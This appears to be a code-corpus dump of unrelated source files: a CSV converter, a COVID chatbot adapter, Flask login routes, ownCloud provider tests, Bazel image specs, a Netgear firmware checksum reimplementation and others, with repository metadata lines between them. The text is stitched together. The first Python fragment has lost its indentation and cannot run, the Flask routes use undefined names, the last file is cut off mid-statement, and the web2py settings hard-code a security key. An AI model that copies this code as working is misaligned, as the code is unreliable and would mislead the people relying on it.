def run(filename,header=None,error_pass=False):
first_time = time.perf_counter()
print("Converting ... ")
json_size=json_convert(filename,header=header,error_pass=error_pass)
if json_size!=None:
pickle_size=json_to_pickle(filename,error_pass=error_pass)
yaml_size=json_to_yaml(filename,error_pass=error_pass)
print(json_size)
print(pickle_size)
print(yaml_size)
second_time = time.perf_counter()
elapsed_time = second_time - first_time
elapsed_time_format = time_convert(str(elapsed_time))
print("Converted In " + elapsed_time_format)
print("Where --> " + Source_dir)
line()
if __name__=="__main__":
args=sys.argv
if len(args)>1:
if args[1].upper()=="TEST":
doctest.testfile("test.py",verbose=True)
elif args[1].upper()=="ALL":
file_header=None
if len(args)>2:
file_header=args[2]
for file in os.listdir():
if file.find(".csv")!=-1:
run(filename=file,header=file_header,error_pass=True)
elif args[1].upper()=="HELP":
help_func()
elif len(args)>2:
run(args[1],header=args[2])
else:
run(args[1])
else:
help_func()
sys.exit()
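# --- Illustrative usage (not part of the original module) -------------------
# Roughly how this entry point is driven, assuming the package is invoked as
# `python -m csv2yaml`:
#   python -m csv2yaml data.csv           convert a single CSV file
#   python -m csv2yaml data.csv HEADER    convert with an explicit header argument
#   python -m csv2yaml all                convert every *.csv in the working directory
#   python -m csv2yaml test               run the bundled doctest file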
| 1,403 |
research_app/ContentSchema.py
|
APrioriInvestments/research_frontend
| 0 |
2170366
|
# Copyright 2019 APriori Investments
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Content-management schema for the research frontend.
"""
import time
from typed_python import OneOf
from object_database import Schema, Indexed, current_transaction
schema = Schema("research_app.ContentSchema")
@schema.define
class ModuleContents:
# gives the prior script in edit-time - if we navigate to an old script and edit it,
# that older script will be the parent.
parent = OneOf(None, schema.ModuleContents)
timestamp = float
# actual contents of the script
contents = str
@schema.define
class Project:
name = Indexed(str)
created_timestamp = float
last_modified_timestamp = float
def deleteSelf(self):
self.delete()
@schema.define
class Module:
name = Indexed(str)
project = Indexed(schema.Project)
current_buffer = str
prior_contents = OneOf(None, ModuleContents)
last_modified_timestamp = float
created_timestamp = float
def update(self, buffer):
"""the user updated the text in the background, but hasn't tried to execute it yet."""
self.current_buffer = buffer
def mark(self):
"""Snapshot this version of the module."""
self.prior_contents = ModuleContents(
parent=self.prior_contents,
contents=self.current_buffer,
timestamp=time.time()
)
def deleteSelf(self):
self.delete()
| 1,980 |
app/chatterbot_custom/covid_adapter.py
|
phu-bui/chatbot_covid19
| 3 |
2169884
|
from chatterbot.logic import LogicAdapter
from chatterbot.conversation import Statement
import logging
from app.services.stats_service import getUsStats, getUkStats
from app.services.news_service import getNews
import random
logging.basicConfig(level=logging.INFO)
class CustomLogicAdapter(LogicAdapter):
def can_process(self, statement):
input_words = ['uk', 'us', 'covid','stats','uk confirmed','uk deaths','uk recovered','uk critical',
'us confirmed','us deaths','us recovered','us critical','all','good news', 'good covid news',
                       'tell me something good','coronavirus positive news','covid positive news',
'Hi', 'Howdy', 'Hello','until next time', 'bye','ciao', 'adios','its been real'
]
        return any(word.lower() in statement.text.lower() for word in input_words)
def process(self, input_statement, additional_response_selection_parameters):
user_input = input_statement.text.lower()
uk_response = getUkStats()
us_response = getUsStats()
news_response = getNews()
if 'uk confirmed' in user_input:
confirmed = uk_response[0].get("confirmed", "")
response_statement = Statement(text='Confirmed Uk Cases {}'.format(confirmed))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'uk deaths' in user_input:
deaths = uk_response[0].get("deaths", "")
response_statement = Statement(text='Confirmed Uk Deaths {}'.format(deaths))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'uk recovered' in user_input:
recovered = uk_response[0].get("recovered", "")
response_statement = Statement(text='Recovered Uk Cases {}'.format(recovered))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'uk critical' in user_input:
critical = uk_response[0].get("critical", "")
response_statement = Statement(text='Critical Uk Cases {}'.format(critical))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'us confirmed' in user_input:
confirmed = us_response[0].get("confirmed", "")
response_statement = Statement(text='Confirmed Us Cases {}'.format(confirmed))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'us deaths' in user_input:
deaths = us_response[0].get("deaths", "")
response_statement = Statement(text='Confirmed Us Deaths {}'.format(deaths))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'us recovered' in user_input:
recovered = us_response[0].get("recovered", "")
response_statement = Statement(text='Recovered Us Cases {}'.format(recovered))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'us critical' in user_input:
critical = us_response[0].get("critical", "")
response_statement = Statement(text='Critical Us Cases {}'.format(critical))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
        elif 'all' in user_input and 'us' in user_input:
response_statement = Statement(text='United States Stats: {}'.format(
'\nconfirmed: ' + str(us_response[0].get("confirmed", "")) +
'\nrecovered: ' + str(us_response[0].get("recovered", "")) +
'\ncritical: '+ str(us_response[0].get("critical", "")) +
'\ndeaths: '+ str(us_response[0].get("deaths", ""))
))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
        elif 'all' in user_input and 'uk' in user_input:
response_statement = Statement(text='United Kingdom Stats: {}'.format(
'\nconfirmed: ' + str(uk_response[0].get("confirmed", "")) +
'\nrecovered: ' + str(uk_response[0].get("recovered", "")) +
'\ncritical: '+ str(uk_response[0].get("critical", "")) +
'\ndeaths: '+ str(uk_response[0].get("deaths", ""))
))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
        elif 'news' in user_input or 'positive' in user_input or 'happy' in user_input or 'good' in user_input:
response_statement = Statement(news_response)
response_statement.confidence = .8
logging.info(response_statement)
return response_statement
        elif 'hi' in user_input or 'howdy' in user_input or 'hello' in user_input:
#add help response
responses = ["""Hello \U0001F31F""", "Hi there!"]
response_statement = Statement(random.choice(responses))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
        elif 'bye' in user_input or 'ciao' in user_input or 'adios' in user_input or 'its been real' in user_input:
#add help response
responses = ["""Bye \U0001F31F""", "Chat later!", "Have a good one"]
response_statement = Statement(random.choice(responses))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
else:
response_statement = Statement(text="I'm sorry I could not understand")
response_statement.confidence = 0
return response_statement
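# --- Illustrative wiring (not part of the original module) ------------------
# chatterbot normally picks up a custom adapter via its dotted import path; the
# bot name and module path below are assumptions based on this repo's layout.
# from chatterbot import ChatBot
# bot = ChatBot(
#     'covid_bot',
#     logic_adapters=['app.chatterbot_custom.covid_adapter.CustomLogicAdapter'],
# )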
| 6,124 |
anagram.py
|
Rahulnigam28/Anagram
| 2 |
2169343
|
#!/usr/bin/python
# function to input strings and check if they are anagram
def is_anagram (s1, s2):
if s1 == s2:
return False
elif len(s1) == len(s2):
x = list(s1)
y = list(s2)
for i in range(0 , len (x)):
for j in range (0 , len (y)):
if x[i] == y[j]:
del y[j]
break
if len(y) == 0:
return True
else:
return False
else:
return False
t = int(input("Enter number of files to read\n"))
filename = []
r = []
for files in range(0, t):
# function to read file and put the words in list
    filename.append(input("Enter name of the file:\r\t\t\t"))
r.append( open(filename[files] ,"r").read().split())
# main function
for files in range(0 , t):
x = r[files]
anagram = {}
for i in range(0, len(x)):
for j in range(1, len (x)):
if x[i] != "" or x[j] != "":
result = is_anagram(x[i],x[j])
if result == True:
del x[j]
x.insert(j,"")
val = len(x[i])
key = x[i]
anagram[key] = val
print("\n \t\t\t %s" %filename[files])
print("Total Number of Words : %d " %len(x))
print ("Numer of Unique Anagrams : %d " %len(anagram))
print("Length of the Longest Anagram: %s \n" %max(anagram.values()))
| 2,205 |
pil_image_analysis_funcs/pilget_exif_data.py
|
SecTraversl/Toolbox_Python_3.8
| 0 |
2170874
|
# %%
#######################################
def pilget_exif_data(image_file: str):
from PIL import Image
from PIL.ExifTags import TAGS
theimage = Image.open(image_file)
dict_exif_data = theimage.getexif()
for name,data in dict_exif_data.items():
tagname = TAGS.get(name, "unknown-tag")
print(f"TAG:{name} ({tagname}) is assigned {data}")
| 381 |
src/controllers/route_controllers_system.py
|
Ron-Chang/spending_tracker_old
| 0 |
2169978
|
from flask import request, jsonify, url_for, redirect
from common.models import User, AdminUser
@app.route('/member_register', methods=['POST'])
def member_register():
"""
    Register a member
"""
request_data = request.get_json()
email = request_data.get('email')
username = request_data.get('username')
non_hash_password = request_data.get('password')
hash_password = Encrypt.encrypt_password(non_hash_password)
source = OAuthType.OUR
user = User(email=email,
username=username,
password=hash_password,
source=source)
db.session.add(user)
db.session.commit()
response_data = {'email': email, 'username': username, 'source': source}
return jsonify(response_data)
@app.route('/member_login', methods=['POST'])
def member_login():
"""
    Member login
"""
request_data = request.get_json()
email = request_data.get('email')
password = request_data.get('password')
user = User.query.filter_by(email=email).first()
if not user:
raise ValidationError(error_code=ErrorCodeDefine.USER_NOT_EXIST_OR_WRONG_PASSWORD)
if not Encrypt.check_password(user.password, password):
raise ValidationError(error_code=ErrorCodeDefine.USER_NOT_EXIST_OR_WRONG_PASSWORD)
token = Login(user=user, email=email).get_token()
response_data = {'email': user.email, 'username': user.username, 'token': token, 'source': user.source}
return jsonify(response_data)
@app.route('/admin_login', methods=['POST'])
def admin_login():
"""
    Administrator login
"""
request_data = request.get_json()
username = request_data.get('username')
password = request_data.get('password')
user = AdminUser.query.filter_by(username=username).first()
if not user:
raise ValidationError(error_code=ErrorCodeDefine.USER_NOT_EXIST_OR_WRONG_PASSWORD)
if not Encrypt.check_password(user.password, password):
raise ValidationError(error_code=ErrorCodeDefine.USER_NOT_EXIST_OR_WRONG_PASSWORD)
token = AdminLogin(user=user, username=username).get_token()
response_data = {'email': user.email, 'username': user.username, 'token': token}
return jsonify(response_data)
| 2,203 |
old/ipr2tsv.py
|
orionzhou/biolib
| 3 |
2166583
|
#!/usr/bin/env python
import os
import os.path as op
import sys
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description = 'parse interproscan output'
)
parser.add_argument(
'fi', help = 'input file'
)
parser.add_argument(
'fo', help = 'output file (tsv)'
)
args = parser.parse_args()
(fi, fo) = (args.fi, args.fo)
dic = dict()
fhi = open(fi, "r")
for line in fhi:
ps = line.strip().split("\t")
aid, md5, plen, aly, sname, sdesc, beg, end, score, status, date = ps[0:11]
iid = ps[11] if len(ps) >= 12 else ''
gid = ps[13] if len(ps) >= 14 else ''
if not aid in dic:
dic[aid] = [set(), set()]
iids = iid.split(",")
for iid in iids:
if iid:
dic[aid][0].add(iid)
gids = gid.split("|")
for gid in gids:
if gid:
dic[aid][1].add(gid)
fhi.close()
fho = open(fo, "w")
for aid, lst in dic.items():
iids, gids = lst
fho.write("%s\t%s\n" % (aid, ";".join(gids)))
fho.close()
| 1,143 |
tests/providers/owncloud/test_provider.py
|
alexschiller/waterbutler
| 0 |
2167556
|
import pytest
import io
from http import client
import aiohttpretty
from waterbutler.core import streams
from waterbutler.core import exceptions
from waterbutler.core.path import WaterButlerPath
from waterbutler.providers.owncloud import OwnCloudProvider
from waterbutler.providers.owncloud.metadata import OwnCloudFileMetadata
from waterbutler.providers.owncloud.metadata import OwnCloudFolderMetadata
@pytest.fixture
def auth():
return {
'name': 'cat',
'email': '<EMAIL>',
}
@pytest.fixture
def credentials():
return {'username':'cat',
'password':'<PASSWORD>',
'host':'https://cat/owncloud'}
@pytest.fixture
def settings():
return {'folder': '/my_folder', 'verify_ssl':False}
@pytest.fixture
def provider(auth, credentials, settings):
return OwnCloudProvider(auth, credentials, settings)
@pytest.fixture
def folder_list():
return b'''<?xml version="1.0" ?>
<d:multistatus xmlns:d="DAV:" xmlns:oc="http://owncloud.org/ns" xmlns:s="http://sabredav.org/ns">
<d:response>
<d:href>/owncloud/remote.php/webdav/</d:href>
<d:propstat>
<d:prop>
<d:getlastmodified>Tue, 21 Jun 2016 00:44:03 GMT</d:getlastmodified>
<d:resourcetype>
<d:collection/>
</d:resourcetype>
<d:quota-used-bytes>714783</d:quota-used-bytes>
<d:quota-available-bytes>-3</d:quota-available-bytes>
<d:getetag>"57688dd358fb7"</d:getetag>
</d:prop>
<d:status>HTTP/1.1 200 OK</d:status>
</d:propstat>
</d:response>
<d:response>
<d:href>/owncloud/remote.php/webdav/Documents/</d:href>
<d:propstat>
<d:prop>
<d:getlastmodified>Tue, 21 Jun 2016 00:44:03 GMT</d:getlastmodified>
<d:resourcetype>
<d:collection/>
</d:resourcetype>
<d:quota-used-bytes>36227</d:quota-used-bytes>
<d:quota-available-bytes>-3</d:quota-available-bytes>
<d:getetag>"57688dd3584b0"</d:getetag>
</d:prop>
<d:status>HTTP/1.1 200 OK</d:status>
</d:propstat>
</d:response>
<d:response>
<d:href>/owncloud/remote.php/webdav/Photos/</d:href>
<d:propstat>
<d:prop>
<d:getlastmodified>Wed, 15 Jun 2016 22:49:40 GMT</d:getlastmodified>
<d:resourcetype>
<d:collection/>
</d:resourcetype>
<d:quota-used-bytes>678556</d:quota-used-bytes>
<d:quota-available-bytes>-3</d:quota-available-bytes>
<d:getetag>"5761db8485325"</d:getetag>
</d:prop>
<d:status>HTTP/1.1 200 OK</d:status>
</d:propstat>
</d:response>
</d:multistatus>'''
@pytest.fixture
def folder_metadata():
return b'''<?xml version="1.0" ?>
<d:multistatus xmlns:d="DAV:" xmlns:oc="http://owncloud.org/ns" xmlns:s="http://sabredav.org/ns">
<d:response>
<d:href>/owncloud/remote.php/webdav/Documents/</d:href>
<d:propstat>
<d:prop>
<d:getlastmodified>Tue, 21 Jun 2016 00:44:03 GMT</d:getlastmodified>
<d:resourcetype>
<d:collection/>
</d:resourcetype>
<d:quota-used-bytes>36227</d:quota-used-bytes>
<d:quota-available-bytes>-3</d:quota-available-bytes>
<d:getetag>"57688dd3584b0"</d:getetag>
</d:prop>
<d:status>HTTP/1.1 200 OK</d:status>
</d:propstat>
</d:response>
</d:multistatus>'''
@pytest.fixture
def file_metadata():
return b'''<?xml version="1.0"?>
<d:multistatus xmlns:d="DAV:" xmlns:s="http://sabredav.org/ns" xmlns:oc="http://owncloud.org/ns">
<d:response>
<d:href>/owncloud/remote.php/webdav/Documents/dissertation.aux</d:href>
<d:propstat>
<d:prop>
<d:getlastmodified>Sun, 10 Jul 2016 23:28:31 GMT</d:getlastmodified>
<d:getcontentlength>3011</d:getcontentlength>
<d:resourcetype/>
<d:getetag>"a3c411808d58977a9ecd7485b5b7958e"</d:getetag>
<d:getcontenttype>application/octet-stream</d:getcontenttype>
</d:prop>
<d:status>HTTP/1.1 200 OK</d:status>
</d:propstat>
</d:response>
</d:multistatus>'''
@pytest.fixture
def file_content():
return b'SLEEP IS FOR THE WEAK GO SERVE STREAMS'
@pytest.fixture
def file_like(file_content):
return io.BytesIO(file_content)
@pytest.fixture
def file_stream(file_like):
return streams.FileStreamReader(file_like)
class TestValidatePath:
@pytest.mark.asyncio
@pytest.mark.aiohttpretty
async def test_validate_v1_path_file(self, provider, file_metadata):
path = WaterButlerPath('/triangles.txt', prepend=provider.folder)
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=file_metadata, auto_length=True, status=207)
try:
wb_path_v1 = await provider.validate_v1_path('/triangles.txt')
except Exception as exc:
pytest.fail(str(exc))
wb_path_v0 = await provider.validate_path('/triangles.txt')
assert wb_path_v1 == wb_path_v0
@pytest.mark.asyncio
@pytest.mark.aiohttpretty
async def test_validate_v1_path_folder(self, provider, folder_metadata):
path = WaterButlerPath('/myfolder/', prepend=provider.folder)
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=folder_metadata, auto_length=True, status=207)
try:
wb_path_v1 = await provider.validate_v1_path('/myfolder/')
except Exception as exc:
pytest.fail(str(exc))
wb_path_v0 = await provider.validate_path('/myfolder/')
assert wb_path_v1 == wb_path_v0
class TestCRUD:
@pytest.mark.asyncio
@pytest.mark.aiohttpretty
async def test_download(self, provider, file_metadata, file_like):
path = WaterButlerPath('/triangles.txt', prepend=provider.folder)
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=file_metadata, auto_length=True, status=207)
aiohttpretty.register_uri('GET', url, body=b'squares', auto_length=True, status=200)
result = await provider.download(path)
content = await result.response.read()
assert content == b'squares'
@pytest.mark.asyncio
@pytest.mark.aiohttpretty
async def test_upload(self, provider, file_stream, file_metadata):
path = WaterButlerPath('/phile', prepend=provider.folder)
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=file_metadata, auto_length=True, status=207)
aiohttpretty.register_uri('PUT', url, body=b'squares', auto_length=True, status=201)
metadata, created = await provider.upload(file_stream, path)
expected = OwnCloudFileMetadata('dissertation.aux','/owncloud/remote.php/webdav/Documents/phile',
{'{DAV:}getetag':'"a3c411808d58977a9ecd7485b5b7958e"',
'{DAV:}getlastmodified':'Sun, 10 Jul 2016 23:28:31 GMT',
'{DAV:}getcontentlength':3011})
assert created is True
assert metadata.name == expected.name
assert metadata.size == expected.size
assert aiohttpretty.has_call(method='PUT', uri=url)
@pytest.mark.asyncio
@pytest.mark.aiohttpretty
async def test_delete(self, provider, file_metadata):
path = WaterButlerPath('/phile', prepend=provider.folder)
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=file_metadata, auto_length=True, status=207)
path = await provider.validate_path('/phile')
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('DELETE', url, status=204)
await provider.delete(path)
class TestMetadata:
@pytest.mark.asyncio
@pytest.mark.aiohttpretty
async def test_metadata(self, provider, folder_list):
path = WaterButlerPath('/', prepend=provider.folder)
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=folder_list, auto_length=True, status=207)
path = await provider.validate_path('/')
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=folder_list, status=207)
result = await provider.metadata(path)
assert isinstance(result, list)
assert len(result) == 2
assert result[0].kind == 'folder'
assert result[0].name == 'Documents'
class TestOperations:
    @pytest.mark.asyncio
    async def test_can_intra_copy(self, provider):
        assert provider.can_intra_copy(provider)
    @pytest.mark.asyncio
    async def test_can_intra_move(self, provider):
        assert provider.can_intra_move(provider)
| 9,542 |
src/main/docker/images.bzl
|
VideoAmp/cross-media-measurement
| 4 |
2170592
|
# Copyright 2020 The Cross-Media Measurement Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Container image specs."""
load("//build:variables.bzl", "IMAGE_REPOSITORY_SETTINGS")
_PREFIX = IMAGE_REPOSITORY_SETTINGS.repository_prefix
# List of specs for all Docker containers to push to a container registry.
# These are common to both local execution (e.g. in Kind) as well as on GKE.
COMMON_IMAGES = [
struct(
name = "duchy_async_computation_control_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/server:async_computation_control_server_image",
repository = _PREFIX + "/duchy/async-computation-control",
),
struct(
name = "duchy_herald_daemon_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/daemon/herald:herald_daemon_image",
repository = _PREFIX + "/duchy/herald",
),
struct(
name = "duchy_liquid_legions_v2_mill_daemon_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/daemon/mill/liquidlegionsv2:gcs_liquid_legions_v2_mill_daemon_image",
repository = _PREFIX + "/duchy/liquid-legions-v2-mill",
),
struct(
name = "duchy_publisher_data_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/server:publisher_data_server_image",
repository = _PREFIX + "/duchy/publisher-data",
),
struct(
name = "duchy_spanner_computations_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/server:spanner_computations_server_image",
repository = _PREFIX + "/duchy/spanner-computations",
),
struct(
name = "kingdom_global_computation_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/kingdom/deploy/common/server:global_computation_server_image",
repository = _PREFIX + "/kingdom/global-computation",
),
struct(
name = "kingdom_requisition_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/kingdom/deploy/common/server:requisition_server_image",
repository = _PREFIX + "/kingdom/requisition",
),
struct(
name = "kingdom_system_requisition_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/kingdom/deploy/common/server:system_requisition_server_image",
repository = _PREFIX + "/kingdom/system-requisition",
),
struct(
name = "kingdom_data_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/kingdom/deploy/gcloud/server:gcp_kingdom_data_server_image",
repository = _PREFIX + "/kingdom/data-server",
),
struct(
name = "setup_spanner_schema_image",
image = "//src/main/kotlin/org/wfanet/measurement/tools:push_spanner_schema_image",
repository = _PREFIX + "/setup/push-spanner-schema",
),
]
# List of specs for all Docker containers to push to a container registry.
# These are only used on GKE.
GKE_IMAGES = [
struct(
name = "duchy_computation_control_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/server:gcs_computation_control_server_image",
repository = _PREFIX + "/duchy/computation-control",
),
struct(
name = "duchy_metric_values_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/server:gcp_server_image",
repository = _PREFIX + "/duchy/metric-values",
),
]
# List of image build rules that are only used locally (e.g. in Kind).
LOCAL_IMAGES = [
struct(
name = "forwarded_storage_liquid_legions_v2_mill_daemon_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/daemon/mill/liquidlegionsv2:forwarded_storage_liquid_legions_v2_mill_daemon_image",
),
struct(
name = "forwarded_storage_computation_control_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/server:forwarded_storage_computation_control_server_image",
),
struct(
name = "spanner_forwarded_storage_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/server:spanner_forwarded_storage_server_image",
),
struct(
name = "fake_storage_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/storage/filesystem:server_image",
),
]
ALL_GKE_IMAGES = COMMON_IMAGES + GKE_IMAGES
ALL_LOCAL_IMAGES = COMMON_IMAGES + LOCAL_IMAGES
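# Illustrative sketch (assumption, not part of this file): the spec lists above
# are meant to be consumed by a push macro. With rules_docker's container_push
# the wiring could look roughly like the following; the load path, registry
# value and attribute names may differ in this repository.
#
#   load("@io_bazel_rules_docker//container:container.bzl", "container_push")
#
#   def push_all_images(images = ALL_GKE_IMAGES, registry = "gcr.io/my-project", tag = "latest"):
#       for spec in images:
#           container_push(
#               name = spec.name + "_push",
#               image = spec.image,
#               format = "Docker",
#               registry = registry,
#               repository = spec.repository,
#               tag = tag,
#           )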
| 5,058 |
part_7/firmware_building/checksums/libacos.py
|
zcutlip/broken_abandoned
| 28 |
2168436
|
#!/usr/bin/env python
import sys
"""
reimplementation of calculate_checksum() from
netgear libacos_shared.so
binary MD5: 660c1e24aa32c4e096541e6147c8b56e libacos_shared.so
"""
class LibAcosChecksum(object):
def __init__(self,data,data_len,checksum_offset=-1):
self.dword_623A0=0
self.dword_623A4=0
fake_checksum="\x00\x00\x00\x00"
self.data=data[0:data_len]
if(checksum_offset > -1):
self.data=(self.data[0:checksum_offset]+
fake_checksum+
self.data[checksum_offset+len(fake_checksum):])
self._update(self.data[0:data_len])
self._finalize()
def _update(self,data):
size=len(data)
t0=self.dword_623A0
a0=self.dword_623A4
a2=size
a3=0
while a3 != a2:
v1=ord(data[a3])
a3+=1
a0=(a0+v1) & 0xffffffff
t0=(t0+a0) & 0xffffffff
self.dword_623A0=t0
self.dword_623A4=a0
return 1
def _finalize(self):
v0=self.dword_623A0
v1=self.dword_623A4
a0=(v0 & 0xffff)
v0=(v0>>16 )
v0=(v0+a0) & 0xffffffff
a2=(v1 & 0xffff)
v1=(v1>>16)
v1=(v1+a2) & 0xffffffff
a1=v0>>16
a1=(a1+v0) & 0xffffffff
a0=v1>>16
a1=(a1 & 0xffff)
a0=(a0+v1) & 0xffffffff
a0=(a0 & 0xffff)
v0=(a1<<16) & 0xffffffff
a2=(v0 | a0)
v0=a2
self.dword_623A4=a0
self.dword_623A0=a1
self.checksum = v0
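# Worked example (not part of the original script): for the 4-byte input "ABCD"
# the running sums reach 266 (sum of bytes) and 660 (sum of the running sums),
# and _finalize() folds them into the two 16-bit halves 0x0294 and 0x010a, so
#   LibAcosChecksum("ABCD", 4).checksum == 0x0294010a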
if __name__=="__main__":
firmware=sys.argv[1]
size=int(sys.argv[2],0)
data=open(firmware,"rb").read()
if size > len(data):
raise Exception("size: %d is longer than data length: %d" % (size,len(data)))
checksum=LibAcosChecksum(data,size).checksum
print("Checksum: 0x%08x" % checksum)
| 1,986 |
applications/piraoke/models/0.py
|
Querra/piraoke
| 0 |
2169806
|
from gluon.storage import Storage
settings = Storage()
settings.migrate = True
settings.title = 'Piraoke'
settings.subtitle = 'powered by web2py'
settings.author = '<NAME>'
settings.author_email = '<EMAIL>'
settings.keywords = 'pi, karaoke'
settings.description = 'Karaoke application for raspberry pi'
settings.layout_theme = 'Default'
settings.database_uri = 'sqlite://storage.sqlite'
settings.security_key = '56f5254c-1be4-4abf-8a5f-132c872ac9a9'
settings.email_server = 'localhost'
settings.email_sender = '<EMAIL>'
settings.email_login = ''
settings.login_method = 'local'
settings.login_config = ''
settings.plugins = []
| 628 |
api/app/auth/api_routes.py
|
Sguerreroo/electricity-market-analysis
| 0 |
2169265
|
import random
from flask import request, make_response
from werkzeug.security import check_password_hash
from flask_jwt_extended import (
jwt_required, create_access_token,
jwt_refresh_token_required, create_refresh_token,
get_jwt_identity, set_access_cookies,
set_refresh_cookies, unset_jwt_cookies
)
from . import auth_bp
from .models import User
from app.models import Potential_Customer_Notification
from app.customer.models import Customer
from app.company.models import Company
from .schemas import UserSchema
from app.customer.schemas import CustomerSchema
from app.company.schemas import CompanySchema
@auth_bp.route("/signup-customer", methods=["POST"])
def signup_customer():
if not request.is_json:
return "Missing JSON in request", 400
data = request.get_json()
errors = {}
errors.update(validateUser(data))
errors.update(validateCustomer(data))
if errors:
return errors, 422
if User.get_by_username(data['username']):
return {"username": ["Nombre de usuario no disponible"]}, 422
if Customer.get_by_nif(data['nif']):
return {"nif": ["Este NIF ya ha sido registrado"]}, 422
user = User(username=data['username'], user_type=1)
user.set_password(data['password'])
user.save()
customer = Customer(
nif=data['nif'].upper(),
name=data['name'],
surname=data['surname'],
email=data['email'],
user_id=user.id
)
customer.save()
companies = Company.get_random_companies(random.randint(20, 40))
for company in companies:
p_c_n = Potential_Customer_Notification(
nif=customer.nif,
cif=company.cif
)
p_c_n.save()
return "", 200
@auth_bp.route('/signup-company', methods=["POST"])
def signup_company():
if not request.is_json:
return "Missing JSON in request", 400
data = request.get_json()
errors = {}
errors.update(validateUser(data))
errors.update(validateCompany(data))
if errors:
return errors, 422
if User.get_by_username(data['username']):
return {"username": ["Nombre de usuario no disponible"]}, 422
if Company.get_by_cif(data['cif']):
return {"cif": ["Este CIF ya ha sido registrado"]}, 422
user = User(username=data['username'], user_type=0)
user.set_password(data['password'])
user.save()
company = Company(
cif=data['cif'].upper(),
name=data['name'],
address=data['address'],
url=data['url'],
email=data['email'],
company_type=data['companytype'],
phone=data['phone'],
user_id=user.id
)
company.save()
return "", 200
@auth_bp.route("/login", methods=["POST"])
def login():
if not request.is_json:
return "Missing JSON in request", 400
data = request.get_json()
username = data['username']
password = data['password']
user = User.get_by_username(username)
if user and user.check_password(password):
access_token = create_access_token(identity=username)
refresh_token = create_refresh_token(identity=username)
result_response = {
"login": True,
"user_type": user.user_type
}
if user.user_type == 0:
company = Company.get_by_user_id(user.id)
result_response["company_type"] = company.company_type
response = make_response(result_response)
set_access_cookies(response, access_token)
set_refresh_cookies(response, refresh_token)
return response, 200
return "User or password incorrect", 400
@auth_bp.route('/logout', methods=["POST"])
def logout():
resp = make_response({'logout': True})
unset_jwt_cookies(resp)
return resp, 200
def validateUser(data):
user = {
"username": data["username"],
"password": data["password"],
"passwordconfirmation": data["passwordconfirmation"]
}
user = {k: v for k, v in user.items() if v}
return UserSchema().validate(user)
def validateCustomer(data):
customer = {
"nif": data["nif"],
"name": data["name"],
"surname": data["surname"],
"email": data["email"],
}
customer = {k: v for k, v in customer.items() if v}
return CustomerSchema().validate(customer)
def validateCompany(data):
company = {
"name": data["name"],
"cif": data["cif"],
"url": data["url"],
"email": data["email"],
"phone": data["phone"],
}
company = {k: v for k, v in company.items() if v}
return CompanySchema().validate(company)
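# Illustrative sketch (not part of the original module): a token-refresh endpoint
# built from the flask_jwt_extended helpers already imported above. The route
# name and response shape are assumptions.
@auth_bp.route("/refresh", methods=["POST"])
@jwt_refresh_token_required
def refresh():
    current_user = get_jwt_identity()
    access_token = create_access_token(identity=current_user)
    response = make_response({"refresh": True})
    set_access_cookies(response, access_token)
    return response, 200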
| 4,128 |
fediverse/views/renderer/activity/Create.py
|
YuzuRyo61/CrossPlan
| 8 |
2169592
|
from django.conf import settings
from django.shortcuts import get_object_or_404
from django.urls import reverse
from fediverse.models import User
def RenderCreate(uuid, actor, obj):
target = User.objects.get(username__iexact=actor)
return {
"id": f"https://{settings.CP_ENDPOINT}{reverse('Fediverse:PostActivity', kwargs={'uuid': str(uuid)})}",
"type": "Create",
